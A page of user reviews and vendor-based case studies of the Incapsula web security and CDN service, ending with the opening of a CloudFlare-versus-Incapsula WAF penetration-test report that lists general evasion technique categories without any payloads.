      - For example, Incapsula does not check the protocol (HTTP vs. HTTPS) when serving cached pages.

      - There is no possibility to create a caching rule based on a regular expression.

      Deployment Issues

      No issues encountered.

      Stability Issues

      No issues encountered.

      Scalability Issues

      No issues encountered.

      Customer Service and Technical Support

      Their support team is great and you get a response/resolution within five minutes of submitting a support ticket.

      Pricing, Setup Cost and Licensing

      You can save some licenses/money if you have your own load balancer. No matter how many websites your load balancer is serving, you will need only one Incapsula ‘website’. We’ve managed to use two Incapsula ‘websites’ to serve approximately 150 real websites.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user288354
      President/General Manager with 51-200 employees
      Vendor
      It solves the issue of not being able to install an on-premise WAF solution or other security device.

      What is most valuable?

      • Web security
      • Protection against DDoS
      • Easy to use administration portal
      • Reports
      • It’s simple to configure
      • Very effective
      • Easy solution to administer for protecting websites of all sizes

      How has it helped my organization?

      Any website that we publish on the web needs to be fully protected. In hosting environments, installing an on-premise WAF solution or other security device is not feasible. Incapsula provides a very simple to install and configure solution, that can be up and running in minutes. Also, now, we don’t have to worry about the security of the website, or if the bandwidth needs to be increased, as everything is automatic.

      What needs improvement?

      It would be nice to have a mobile app as a dashboard interface instead of the web administration, but the service is really great. The product is the best at what it does.

      For how long have I used the solution?

      I've used it for three years.

      What was my experience with deployment of the solution?

      Once the DNS configuration is done, everything works flawlessly.

      What do I think about the stability of the solution?

      No issues encountered.

      What do I think about the scalability of the solution?

      No - in a large scale attack, the protection scaled without problem.

      How are customer service and technical support?

      Customer Service:

      Service is good and prompt, 9/10.

      Technical Support:

      I haven’t had much need for tech support.

      Which solution did I use previously and why did I switch?

      We previously used Cloudflare. Although a very good solution, it forces users to completely give up the DNS management of their domain, which most enterprises don’t want to do. Incapsula only needs a redirection of the actual web entry.

      How was the initial setup?

      Very straightforward. The default settings work very well and are running within minutes. Configuration of advanced features is simple and fast.

      What about the implementation team?

      Through our own in-house team.

      What was our ROI?

      It’s difficult to measure, but without Incapsula, we would be forced to host the website on-premises, with very high costs. ROI is probably within six months.

      What's my experience with pricing, setup cost, and licensing?

      Setup cost was zero. Annual cost is $7,200.

      Which other solutions did I evaluate?

      We evaluated Cloudflare as well.

      What other advice do I have?

      This is very simple to install. Websites that use SSL should pre-export their certificates and be ready to import them into Incapsula.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor. The reviewer's company has a business relationship with this vendor other than being a customer: We are a Partner of Imperva, who recently acquired Incapsula, although Incapsula is handled completely independently, and we have no relationship to it.
      ITCS user
      Director at a marketing services firm with 51-200 employees
      Vendor
      It provides intelligence on bad IPS and malicious software, and scales without issue.

      What is most valuable?

      • Human contact
      • Fast SLA
      • Trustworthy and excellent communication

      Highly-functional back office with user friendly reports and intelligence on bad IPS and malicious software is at very high level and very quick. Part of the solutions function is that they have to stay on top of the data intelligence game. They have the first knowledge of break points.

      How has it helped my organization?

      The product makes information readily available and mitigates any problems quickly.

      What needs improvement?

      With the way that protection works, there is no such thing as pure protection, but as soon as Incapsula knows what a problem looks like, they fix it. They have to stay on top of the data intelligence game.

      For how long have I used the solution?

      I've used it for three years.

      What was my experience with deployment of the solution?

      It's usually fast but it can take two to three days on a big operation to get it live, especially if there is tracking.

      What do I think about the scalability of the solution?

      No problem with scalability.

      How are customer service and technical support?

      Customer Service:

      Communication declined a bit as they got bigger – 7/10. Service is really good though.

      Technical Support:

      8/10. Service is good.

      Which solution did I use previously and why did I switch?

      We went through at least a quarter million dollars in DDoS firewalls before we got to them. We tried solutions worldwide.

      What's my experience with pricing, setup cost, and licensing?

      For enterprise level stuff pricing is very competitive. Very good corporate deals.

      What other advice do I have?

      Go for it if you’re looking into it – they are a good solution and are trustworthy people. Just really works.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user279876
      IT Manager with 501-1,000 employees
      Vendor
      Because of the load balance functionality, our site is available despite attacks.

      What is most valuable?

      DDOS defence Load balancing Security role

      How has it helped my organization?

      The availability of our sites, thanks to the load balance functionality, has improved. It enables the site to be available all the time, despite people trying to attack it.

      What needs improvement?

      More features to help fine tune it. In general, more features for the platform would be nice.

      For how long have I used the solution?

      I’ve used it for two to three years.

      What was my experience with deployment of the solution?

      I used the customer service once.

      What do I think about the stability of the solution?

      Once or twice, there has been downtime, but it was only a matter of minutes.

      What do I think about the scalability of the solution?

      No issues encountered. …

      What is most valuable?

      • DDOS defence
      • Load balancing
      • Security role

      How has it helped my organization?

      The availability of our sites, thanks to the load balance functionality, has improved. It enables the site to be available all the time, despite people trying to attack it.

      What needs improvement?

      More features to help fine tune it. In general, more features for the platform would be nice.

      For how long have I used the solution?

      I’ve used it for two to three years.

      What was my experience with deployment of the solution?

      I used the customer service once.

      What do I think about the stability of the solution?

      Once or twice, there has been downtime, but it was only a matter of minutes.

      What do I think about the scalability of the solution?

      No issues encountered.

      How are customer service and technical support?

      Customer Service:

      It was pretty high quality service. They guarantee to fix your problem within 15 minutes, but they don’t always keep their word.

      Technical Support:

      They are professional people who provide solutions.

      Which solution did I use previously and why did I switch?

      No previous solution used.

      How was the initial setup?

      It was very simple.

      What about the implementation team?

      It was done in-house.

      What's my experience with pricing, setup cost, and licensing?

      The price is between $5,000 and $10,000.

      What other advice do I have?

      The product experience is really easy, therefore you should go and experience it.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      it_user277947
      Online Marketing Manager with 1,001-5,000 employees
      Vendor
      The user-generated spam stopped after we started using it to speed up and protect our website.

      What is most valuable?

      Their WAS - I had a problem and I turned to Incapsula. I needed someone to protect the website and they succeeded in this regard.

      How has it helped my organization?

      We’re not an e-commerce site, but a website for providing information, and we needed someone to protect the website. The user-generated spam stopped after we started using Incapsula, and so we feel more secure.

      What needs improvement?

      I needed some support and according to the SLA and I couldn’t get telephone support and it took a little while till they got back to me. We’re an enterprise company so I think I would be happier for a bit more support to pick the phone up and ask a question. There was not as much back office help as we would have liked.

      For how long have I used the solution?

      I’ve used it for four months.

      What was my experience with deployment of the solution?

      Yes, we had some down time but we solved it. It took us a few hours although we were promised no down time.

      What do I think about the stability of the solution?

      No issues with stability, but I still have to look into whether the site speed was faster than it was before as promised.

      What do I think about the scalability of the solution?

      No issues with scalability.

      How are customer service and technical support?

      Customer Service:

      8/10 – very professional.

      Technical Support:

      8/10 – very professional once they got back to me.

      Which solution did I use previously and why did I switch?

      I didn’t use any other solution.

      What's my experience with pricing, setup cost, and licensing?

      It’s not costly for my needs.

      Which other solutions did I evaluate?

      I knew the solutions available in the market because I was working in a cyber-security company. I suggested the product, because I knew the product and that they are better than other solutions for my needs.

      What other advice do I have?

      Do it on a Sunday in case there is down time. I would ask for support after implementation, and check that the site speed is as fast as it should be.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      it_user277953
      ICT Director with 501-1,000 employees
      Vendor
      We've had no compromises to our website and services from potential threats, hackers, etc. as the Web Application firewall has been effective.

      What is most valuable?

      The Web Application firewall is a valuable feature as the security features are mostly what we're interested in.

      How has it helped my organization?

      We hope that the product helps protect us from potential threats, hackers etc. that compromise our website and services. We want peace of mind. The fact that nothing has occurred is a good thing.

      What needs improvement?

      We’ve had a few, short outages that didn't have an impact on the business. One outage lasted a couple of hours, so the reliability could be improved.

      At times, we can prove the service is not running, but technical support doesn’t reflect that fact. We appreciate that nothing is 100% reliable, but we'd appreciate more information during an outage and not after the fact.

      Also, reporting could be improved. We shouldn’t have to look on Twitter to see if others are experiencing a similar issue. Greater transparency is needed when there is an issue.

      For how long have I used the solution?

      I've used it for about two years.

      What was my experience with deployment of the solution?

      No issues at all.

      What do I think about the stability of the solution?

      We have had a few outages.

      What do I think about the scalability of the solution?

      No issues on that front as we haven’t needed to scale it.

      How are customer service and technical support?

      Customer Service:

      Average to poor.

      Technical Support:

      Average to poor.

      Which solution did I use previously and why did I switch?

      Yes, we used Barracuda. The product was not difficult to configure but it didn’t work well. There was high latency in the product.

      How was the initial setup?

      It was straightforward.

      What's my experience with pricing, setup cost, and licensing?

      Cost is OK. It’s more expensive than CloudFlare and Amazon but it’s got better features. We are happy with the price, its just the information and reliability, otherwise we would be happy to give a glowing recommendation.

      Which other solutions did I evaluate?

      We looked at CloudFlare, but they don’t offer the same security features. Incapsula was selected because of the uniqueness of the security features.

      What other advice do I have?

      I think it’s a leading product, a market leader; that’s how it feels to us. But I don’t think it would be a good product if i'ts mission critical. You'd need to proceed with a certain amount of caution because we haven’t had 100% uptime.

      Disclosure: IT Central Station contacted the reviewer to collect the review and to validate authenticity. The reviewer was referred by the vendor, but the review is not subject to editing or approval by the vendor.
      ITCS user
      Founder and Team Head at a tech services company with 51-200 employees
      Consultant
      Overall it worked well without any glitches.
      I’ve been using Incapsula CDN for about a month now, So I’d thought to write down a review about my experience. The loading time of a site is important, quite important. The loading time comes among various factors used for ranking a site, With site speed getting so much buzz around the town, your site/blog needs to be quick to be ranked high. The site loading time should be as minimum as possible, this not only makes your site loved by users and bots but also increases your conversion rates. When decreasing your site load speed time, you have to look along several factors, the list of which includes things as easy as optimizing images to as complicated as combining CSS and JS files, the list includes several other things too. One thing which can make your life easier while…

      I’ve been using Incapsula CDN for about a month now, So I’d thought to write down a review about my experience. The loading time of a site is important, quite important. The loading time comes among various factors used for ranking a site, With site speed getting so much buzz around the town, your site/blog needs to be quick to be ranked high. The site loading time should be as minimum as possible, this not only makes your site loved by users and bots but also increases your conversion rates.

      When decreasing your site load speed time, you have to look along several factors, the list of which includes things as easy as optimizing images to as complicated as combining CSS and JS files, the list includes several other things too. One thing which can make your life easier while optimizing your site for speed is to use a CDN ( Content Delivery Network ) It is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server. This decrease your site load time, and in addition to this most of the CDN’s provide you a one check option for minimizing HTML, CSS, JS etc.

      I’ve now been with Incapsula CDN for about a month now, Before this I used Cloudflare for some time. But lets stick to Incapsula only. About Incapsula CDN : Like most of the CDNs around the web, this CDN is also paid. The good thing is it has a trial version, by deducting some of the features they allow you to use their CDN for Free. The premium account ( Of course paid, contains all the features ).

      After you create an account, add your site and make the necessary changes, and log-in to your account. The very first page which would appear would be “My sites” page displaying your websites. Click on your site’s URL and tab with your traffic stats open up. The traffic stats displaying are different when compared to Google analytics or any other plugin. The tab like one displayed above will appear. The Real time traffic feature as displayed is for paid users only.

      For unleashing the max speed, you need your content to be optimized. The large CSS and JS coding should be minimized and so is with the HTML too. Using a plugin for this purpose can be an option, but Incapsula provides an in-built option too. You just need to go to the settings > performance and check in the options like the snapshot in the left.

      Before we continue, let me tell you my previous stats for an easy comparison. I have this blog hosted on a shared host with usual features offered. Initially my blog’s loading time was 5 sec ( Because I didn’t had much content ) but after using several themes, plugins and publishing some posts the margin increased to 11 sec, this was quite hurting, for readers as well as my rankings. So I decided to use a CDN, and the results after using the Incapsula CDN are :

      After using the CDN, my gtmetrix report stats the following, the page speed grade being 93%, Yslow grade 85% and B in loading time. It is overall much convincing comparing the fact that they were quite below this margin before. I tested it on Gtmetrix three times and then thought to test it on pingdom tools. The test revealed that my site speed dropped down to 3 seconds from 11 seconds and 84/100 grade. So, this explains how useful is the Incapsula CDN if you care about the speed of your site/blog.

      Final words : I was pretty much convinced by the Incapsula CDN, Overall it worked well without any glitches or breaking down the theme or stylesheet of my blog. I suggest the use of Incapsula’s CDN on your blog/site to decrease your site load time and increase your conversation rates.

      So, how has your Incapsula experience been ?

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user12231
      Owner at a tech services company with 51-200 employees
      Consultant
      Speed up WordPress – increase security
      In a nutshell this is what Incapsula does: Incapsula offers state-of-the-art security and performance to websites of all sizes. Through a simple DNS change, your website’s traffic is seamlessly routed through Incapsula’s globally-distributed network of high-powered servers. Incoming traffic is intelligently profiled in real-time, blocking even the latest web threats: from sophisticated SQL injection attacks to scrapers, malicious bots, intruding comment spammers and thwarting multi-Gigabit DDoS attacks. Meanwhile, outgoing traffic is accelerated and optimized with Incapsula’s global CDN, for faster load times, keeping welcome visitors speeding through. I’ve always been interested in how to make my website faster but with the news about brute force attacks on…

      In a nutshell this is what Incapsula does:

      Incapsula offers state-of-the-art security and performance to websites of all sizes. Through a simple DNS change, your website’s traffic is seamlessly routed through Incapsula’s globally-distributed network of high-powered servers. Incoming traffic is intelligently profiled in real-time, blocking even the latest web threats: from sophisticated SQL injection attacks to scrapers, malicious bots, intruding comment spammers and thwarting multi-Gigabit DDoS attacks. Meanwhile, outgoing traffic is accelerated and optimized with Incapsula’s global CDN, for faster load times, keeping welcome visitors speeding through.

      I’ve always been interested in how to make my website faster but with the news about brute force attacks on WordPress, I wanted a more secure website as well. Researching WordPress security, I was surprised to find the following image from Incapsula on what sort of traffic you actually get.

      I don’t know how accurate this study is, I would like to see more data but I was surprised to say the least. I didn’t know just how much bandwidth could be wasted by automated services on your website.

      So I decided to try Incapsula to see what it could do for my website and try and show you through this Incapsula review, just what this product can do.

      But what can Incapsula do against all of this? A much easier way of answering this would be to watch their promo video

      Install Incapsula
      The installation was pretty easy and within 5 mins I was done. All that is required is to change your DNS records, you can see more about the setup here.
      For WordPress users it’s also advised for you to install their WordPress plugin.

      By using this plugin you will have no change to your originating IPs when using Incapsula. Incapsula acts as a reverse proxy and all incoming connections to your website first pass through one of Incapsula’s servers. This plugin will ensure that you continue to see the real originating IP of your website visitors.

      Once this is all setup, it’s just a waiting game for Incapsula to start collecting the data.

      Inside Incapsula

      inside-incapsula

      Once the DNS changes have been made and Incapsula has had time to do its job, you’ll see an image like above when you log in. This is a 7 day run down of what has been going on with your website. As you can see my bot visits out-number the human visits by quite some way.

      Not all bots are bad however, I need Google-bot in order for my website to be found as well you a large number of other good bots but Incapsula reports that in the last 7 days there’s been 158 bad bots on my website!

      Incapsula security

      To test the security of Incapsula, I deleted my Askimet plugin as Incapsula can handle comment bots and protect me from spam. I also let it run for 7 days to see what it would report. Here’s my 7 day run down of what happened on my website.

      Going further into the Incapsula dashboard you get a run down of the top attacking countries with USA being my top one with 30% next is China with 20%.

      Incapsula also gives you a run down of the types of threats to your website.

      threats

      So it’s clear that bots are my biggest problem and Incapsula also shows what type of bot is causing the most problems, in my case it’s the comment spammer with 94%. I did want to test just how good Incapsula was so I deleted my Askimet plugin. Considering the amount of comment spammer bots visting my websites, Incapsula does a very good job of protecting my website. Although I still get a couple of spam comments a day without Askimet, I’m still impressed with Incapsula.

      comment-spammer

      Incapsula will also email you when there’s a threat. This is an email I got yesterday when someone tried to login to my website. Incapsula blocked the request.

      login

      This image is also provided by incapsula showing the top client applications. It surprising just how many bots are out there on the Internet!
      bots2

      To get a better idea of bot vs humans, Incapsula provides you with the following image. This is a nice example of just how much of your bandwidth is being wasted with unwanted bots on your website.

      bots

      Incapsula speed

      Not only does Incapsula do a pretty god job of protecting your website but it also increases the speed of it. By blocking unwanted bots and saving your bandwidth, it not only saves you resources and money but you also get to use their CDN for a faster website.

      So I wanted to test the speed of Incapsula, I switched to advanced performance and tested the before and after. The results are below.

      Before advanced Incapsula-speed

      After advancedIncapsula-review-speed2

      According to Pingdom switching to advanced performance on Incapsula increased the speed of my website by just over 50%!

      You can also see the response time of the CDN location centers.

      response-time

      With the advanced setting of Incapsula it also caches dynamic cotent which you can read about here. There’s also a good article on how a CDN can help your SEO by Incapsula.

      I’ve been impressed with Incapsula, it not only protects me from spammers and bad bots but it has also increased the speed of my website by over 50%. I found Incapsula very easy to use and once the setup is done everything is done automatically for you leaving you with a peace of mind of a faster website with better security.

      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user11580
      Director of eCommerce with 51-200 employees
      Vendor
      Incapsula provides enterprise-grade security and acceleration to our customers at an affordable price
      We currently host over 1,100 websites and our clients include some of Australia's best known online retail success stories and its largest eBay trader. The nature of the e-commerce business poses a wide range of challenges that we need to deal with on a daily basis in order to keep our clients' online stores up and running. For our clients, time is (literally) money and it’s our responsibility to make sure that all potential problems are handled quickly, before they affect any business transactions. Security is obviously an issue we couldn’t afford to ignore. We spent several months searching for a solution that could meet our clients' demanding security and performance requirements. As it happened, Incapsula had just opened a new data center in Australia, so we decided to give them a try…

      We currently host over 1,100 websites and our clients include some of Australia's best known online retail success stories and its largest eBay trader. The nature of the e-commerce business poses a wide range of challenges that we need to deal with on a daily basis in order to keep our clients' online stores up and running. For our clients, time is (literally) money and it’s our responsibility to make sure that all potential problems are handled quickly, before they affect any business transactions.

      Security is obviously an issue we couldn’t afford to ignore. We spent several months searching for a solution that could meet our clients' demanding security and performance requirements. As it happened, Incapsula had just opened a new data center in Australia, so we decided to give them a try as well. Their cloud-based service won us over - hands down.

      To help companies out there facing similar issues, I wanted to share five key factors that influenced our decision to implement Incapsula.

      1. Reseller Support and Integration Options Integration of new services can be difficult, both from marketing and technology standpoints. Thankfully, Incapsula provided plenty of options, including a cPanel integration and an extremely user-friendly API with interesting reseller-oriented capabilities.

      While reviewing these tools, we came up with a lot of integration ideas. We batted these ideas back and forth with Incapsula's responsive support team and came back impressed with their ability to provide quick and complete answers to our questions.

      Integration always takes time. While we are still working on ours, we know that having the right tools is half the battle. Having the right support makes the other half just a matter of time.

      2. Comprehensive Security The commercial potential of e-commerce sites makes them a lucrative target for an ever-growing array of threats, from code-based vulnerabilities to DDoS attacks. Accordingly, we understand that our clients require reliable security solution, to protect their hosted sites from all types of threats and keep things running as smooth as possible.

      We also know that by taking on more merchants and increasing our total web presence we increase the likelihood of becoming a target. For fast growing hosting platforms, where multiple sites used shared resources, this is a serious issue. After all, the entire server is only as strong as its "weakest link," and one unprotected site can cause substantial collateral damage to our clients, as well as to our own brand reputation and business goals.

      For that reason it was important for us to have a comprehensive solution that helps us cover all bases. With its PCI compliant WAF, DDoS protection and bot filtering technologies, Incapsula helps us do just that – protecting our clients from targeted and automated cyber threats. Today, as Incapsula gets adopted by more and more of our clients, the result is a continual improvement in the resilience of our entire hosted community.

      3. No Sweat PCI Compliance PCI compliance is a must for our e-commerce clients so it was important for us to know that Incapsula’s WAF is certified by the PCI Security Standards.

      Anyone that ever dealt with PCI DSS knows about the dreaded 6.6 requirement. Incapsula meets these specifications with ease, by providing a PCI-compliant WAF for a ridiculously small fraction of the usual price. Basically, it offers a $60 solution to a problem that can easily cost tens of thousands of dollars to address.

      4. Great Value at a Price Your Clients Can Afford To ensure that our clients would benefit from these added-value services, they had to be affordable. Otherwise, no one would sign up. Incapsula's "economy of scale" pricing model made this possible.

      As mentioned, the WAF alone would cost somewhere between $10,000 -$30,000, before man-hours and maintenance fees. Incapsula's bundled service also includes a CDN, dynamic caching, DDoS protection and other features, making it a highly attractive and cost-effective solution for commercial sites.

      This combination of top-tier technology and mid-market prices makes Incapsula a perfect fit for our merchant clients and still allows us to retain a good reseller margin. Incapsula’s security and performance services also enhance the value of our overall offering, improving our client acquisition and retention to further increase our bottom line.

      5. A Partner Who's Got Your Back Most importantly, it's very assuring to know that our own internal team is always backed up by a team of security and networking experts. Incapsula's technical, support and marketing teams have been extremely responsive, reliable and flexible. They worked with us through the initial roll out, and were quick to handle a few minor teething issues, even making changes to their standard system to meet our needs.

      Having a partner who goes the extra mile means a lot and really reinforces our trust, both in the technology itself and in the people behind the technology.

      Disclosure: IT Central Station has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
      it_user71697
      Engineer with 51-200 employees
      Vendor
      Using Incapsula’s DDoS Protection and Load Balancing we maximized our Website Security and Availability
      To support the growing traffic to our website from online traders, we realized that strong protection from DDoS and other types of attacks was only part of the equation. To ensure high availability (99.999% uptime) and consistent performance for our users, we also needed the ability to efficiently distribute website traffic across multiple servers. As our online business grew, it became clear to us that we needed an enterprise-grade service that was able to combine powerful DDoS mitigation together with advanced load-balancing capabilities that would enable us to cost-effectively scale beyond the capacity of a single web server, as well as supporting automatic failover to prevent downtime. Our previous cloud-based DDoS mitigation service supported load balancing via DNS, which by…

      To support the growing traffic to our website from online traders, we realized that strong protection from DDoS and other types of attacks was only part of the equation. To ensure high availability (99.999% uptime) and consistent performance for our users, we also needed the ability to efficiently distribute website traffic across multiple servers.

      As our online business grew, it became clear to us that we needed an enterprise-grade service that was able to combine powerful DDoS mitigation together with advanced load-balancing capabilities that would enable us to cost-effectively scale beyond the capacity of a single web server, as well as supporting automatic failover to prevent downtime.

      Our previous cloud-based DDoS mitigation service supported load balancing via DNS, which by definition is TTL-reliant. This means that in the event of an overloaded server, for example, it may take several minutes before traffic is re-routed to another server. In the meantime, users continue to be routed to the overloaded server, further adding to the load and increasing latency. Another disadvantage of this load balancing method is that TTL may vary for different geographies and ISPs.

      In the extremely time-sensitive world of online trading, it is mandatory that all traders have access to the same information at the same time. DNS-based load balancing was not suitable for our business model and impaired the user experience.

      With these requirements in mind, we started our search for an alternative solution and came across some reviews of Incapsula in online industry forums.

      Following an evaluation of Incapsula against our previous solution, we decided to purchase Incapsula’s comprehensive Enterprise plan, including “always on” DDoS Protection, an enterprise-grade WAF, Load Balancing and a global CDN. Incapsula was initially onboarded for a single server. We added a second server one week later for purposes of Load Balancing and Failover.

      The key factors in our choice of Incapsula was that we were particularly impressed with its enterprise-grade WAF, powerful non-intrusive DDoS protection and efficient load balancing capabilities. From a management point of view, Incapsula’s real-time statistics, easy setup procedures and detailed control panel also represented a significant improvement from our previous solution.

      We use Incapsula's service to secure our online trading platform against any type of DDoS attack (Layers 3, 4 & 7) with virtually zero business disruption. All incoming traffic to our online trading application is filtered by Incapsula, which automatically detects and blocks DDOS attacks and other types of malicious traffic. In addition, Incapsula’s sophisticated and scalable load balancing solution supports several different traffic distribution methods with built-in monitoring and failover capabilities to ensure high availability.

      By using Incapsula's service, we have achieved several concrete benefits:

      • Layer 7 load balancing – Tracks HTTP requests as they are being processed by the origin servers, intelligently distributes the traffic in accordance with actual server loads, and reacts quickly to lags even before the server becomes unresponsive
      • Cloud-based mitigation of network DDoS attacks - Mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
      • Intelligent mitigation of sophisticated application layer attacks - Uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
      • Real-time statistics - Provides a complete, real time view of incoming traffic, security events and server load distribution, allowing rapid response to security events and supporting real-time data driven decisions.

      Incapsula has proven to be a very effective solution for meeting our rigorous security and load balancing requirements. Real-time statistics rock – it’s like having your own NOC at the click of a button, and helps us to better manage our website with 360-degree visibility of all events.

      Disclosure: IT Central Station has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
      it_user70002
      CEO with 51-200 employees
      Real User
      Incapsula helped us stay up during some of the biggest DDoS attacks on record
      To ensure the success of our online trading operations, we place a major emphasis on state-of-the-art security, high availability (99.9% uptime) and user convenience. Daily high-volume network DDoS attacks against our website were wreaking havoc with business operations, resulting in downtime for our online trading platform. The anti-DDoS solutions we had in place was not equipped to mitigate these attacks, which came precisely at the time when we were experiencing record trading volumes. Since our company deals with a highly competitive and time-sensitive trading market, high availability and stability are paramount to building our users' confidence in our platform. It was obvious to us that in order to maintain and grow our business, we needed the best DDoS protection solution. We…

      To ensure the success of our online trading operations, we place a major emphasis on state-of-the-art security, high availability (99.9% uptime) and user convenience.

      Daily high-volume network DDoS attacks against our website were wreaking havoc with business operations, resulting in downtime for our online trading platform. The anti-DDoS solutions we had in place was not equipped to mitigate these attacks, which came precisely at the time when we were experiencing record trading volumes.

      Since our company deals with a highly competitive and time-sensitive trading market, high availability and stability are paramount to building our users' confidence in our platform. It was obvious to us that in order to maintain and grow our business, we needed the best DDoS protection solution.

      We required a high-capacity solution capable of mitigating the largest Layer 3 DDoS attacks, which can often reach several tens of Gbps. Blackholing was not a desirable option, since this aggressive method for diverting traffic actually serves the attackers' goal of denying and disrupting service by not allowing any visitors to reach the site.

      To ensure an optimal user experience, we sought a DDoS mitigation solution that would be transparent to users. In this context, we preferred a solution that does not use delay pages, which cause problems for the application's APIs and prevent users from connecting to the server.

      In terms of architecture, we preferred a cloud-based solution for reasons of cost-effectiveness and compatibility with our existing cloud computing infrastructure.

      Aware of the threat to our core business, we immediately began to look for a new anti-DDoS solution with the network capacity and security proficiency to meet our requirements. After an in-depth evaluation of leading DDoS Protection services in several industry comparisons and reviews, we chose Incapsula's cloud-based DDoS Protection service based on its ability to mitigate any type of DDoS attack with virtually zero business disruption.

      We conducted an initial trial with Incapsula while still experiencing DDoS attacks of up to 100 Gbps. Incapsula mitigated these attacks, keeping the online trading platforms up at all times.

      Our experience so far shows that Incapsula is a marked improvement over other DDoS protection companies we have worked with in the past. Despite the fact that attacks on our high-profile website are still a daily occurrence, traders coming to the site are able to buy and sell without any noticeable degradation in terms of performance and availability.

      Through its non-intrusive traffic filtering and an enterprise-grade Web Application Firewall, Incapsula has been stable in protecting our online applications. The service secures websites and applications against all types of DDoS attacks, as well as sophisticated application attacks such as XSS and SQL injections.

      Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.

      By using Incapsula's DDoS Protection, we have achieved concrete benefits:

      • Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
      • Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
      • "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks can wreak havoc with solutions that need to be manually turned on and off on every burst.
      • Dedicated SoC team – An experienced team of Security Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.

      Incapsula helped us stay up during some of the biggest DDoS attacks on record. This happened at a critical business juncture, when our increasing trading volumes were turning us into the number one bitcoin trading site in the world. We hope to continue working with Incapsula as we gain more exposure and popularity.

      Disclosure: IT Central Station has made contact with the reviewer to validate that the person is a real user. The information in the posting is based upon a vendor-supplied case study, but the reviewer has confirmed the content's accuracy.
      ITCS user
      Infrastructure Expert at a tech services company with 1,001-5,000 employees
      Consultant
      Great service, great value

      Valuable Features:

      Their solutions are always on, in depth and protect against most all web threats imaginable.

      Improvements to My Organization:

      Essentially, it has added an extra layer of protection to my clients through their DNS routing service. Less downtime, and happier clients.

      Valuable Features:

      Their solutions are always on, in depth and protect against most all web threats imaginable.

      Improvements to My Organization:

      Essentially, it has added an extra layer of protection to my clients through their DNS routing service. Less downtime, and happier clients.
      Disclosure: I am a real user, and this review is based on my own experience and opinions.
      it_user68487
      Security Expert with 51-200 employees
      Vendor
      CloudFlare vs Incapsula: Web Application Firewall
      CloudFlare vs Incapsula: Round 2 Web Application Firewall Comparative Penetration Testing Analysis Report v1.0 Summary This document contains the results of a second comparative penetration test conducted by a team of security specialists at Zero Science Lab against two cloud-based Web Application Firewall (WAF) solutions: Incapsula and Cloudflare. This test was designed to bypass security controls in place, in any possible way, circumventing whatever filters they have. Given the rise in application-level attacks, the goal of the test was to provide IT managers of online businesses with a comparison of these WAFs against real-world threats in simulated real-world conditions. Zero Science Lab is a Macedonian Information Security Research and Development Laboratory that…

      CloudFlare vs Incapsula: Round 2
      Web Application Firewall

      Comparative Penetration Testing Analysis Report v1.0

      Summary

      This document contains the results of a second comparative penetration test conducted by a team of security specialists at Zero Science Lab against two cloud-based Web Application Firewall (WAF) solutions: Incapsula and Cloudflare. This test was designed to bypass security controls in place, in any possible way, circumventing whatever filters they have. Given the rise in application-level attacks, the goal of the test was to provide IT managers of online businesses with a comparison of these WAFs against real-world threats in simulated real-world conditions.

      Zero Science Lab is a Macedonian Information Security Research and Development Laboratory that specializes in information security hardening, consulting, network security, vulnerability research, software and hardware security assessment, penetration testing, malware analysis, forensics and much more - https://www.zeroscience.mk

      Background
      In February 2013, we conducted the first comparative pentest analysis of the CloudFlare, Incapsula and ModSecurity Web Application Firewall (WAF) solutions. The goal of a WAF is to block hacker attacks / unwanted malicious traffic to your web application with as few false positives as possible.

      Since then, all three vendors had replied to the findings, applying patches to the discovered bypasses and improving their products to protect their customers from web attacks. In August 2013, CloudFlare even launched a new rule- based WAF to augment their existing heuristics-based WAF (which we used in the first pentest). Since Incapsula also uses a rule-based approach, we decided that now is a good time to run a follow-up pentest comparison, this time focusing only on CloudFlare's new WAF and Incapsula's WAF. Over the past 8 months, both vendors have improved their firewall solution by adding extra features, upgrading the rulesets and signature detection algorithms.

      The difference between this report and the previous one is that now we have focused more on real-world web application exploitation applying known encoding techniques, as well as the rate of false positives.

      Results

      1. Attack Vector coverage
      The table below shows the overall statistics of the exploits testing:

      2. WAF evasion techniques
      Blackbox penetration test was conducted against the two services (using their respective Business Plans), applying known filter evasion techniques to bypass their web application firewall solution using real-world scenarios and variety of attack vectors.

      We wanted to check how the WAFs deal with evasion techniques, and we took common vectors for each rule and obfuscated them using different evasion techniques like:

      • Multi-parameter vectors
      • Microsoft Unicode encoding
      • Invalid characters
      • SQL comments
      • Redundant white space
      • HTML encoding for XSS
      • Javascript escaping for XSS
      • Hex encoding for XSS
      • Character encoding for Directory Traversal

      3. Known Vulnerabilities Handling
      Each of the exploits was executed with their default given payload. After that, we applied the evasion techniques on the same payloads and mark the results. Below is a table that gives you an overview of which vulnerability was blocked and which vulnerability has bypassed the WAF mechanisms for detecting known web application exploits.

      Results (overview of real apps exploit bypass list):

      4. FalsePositives
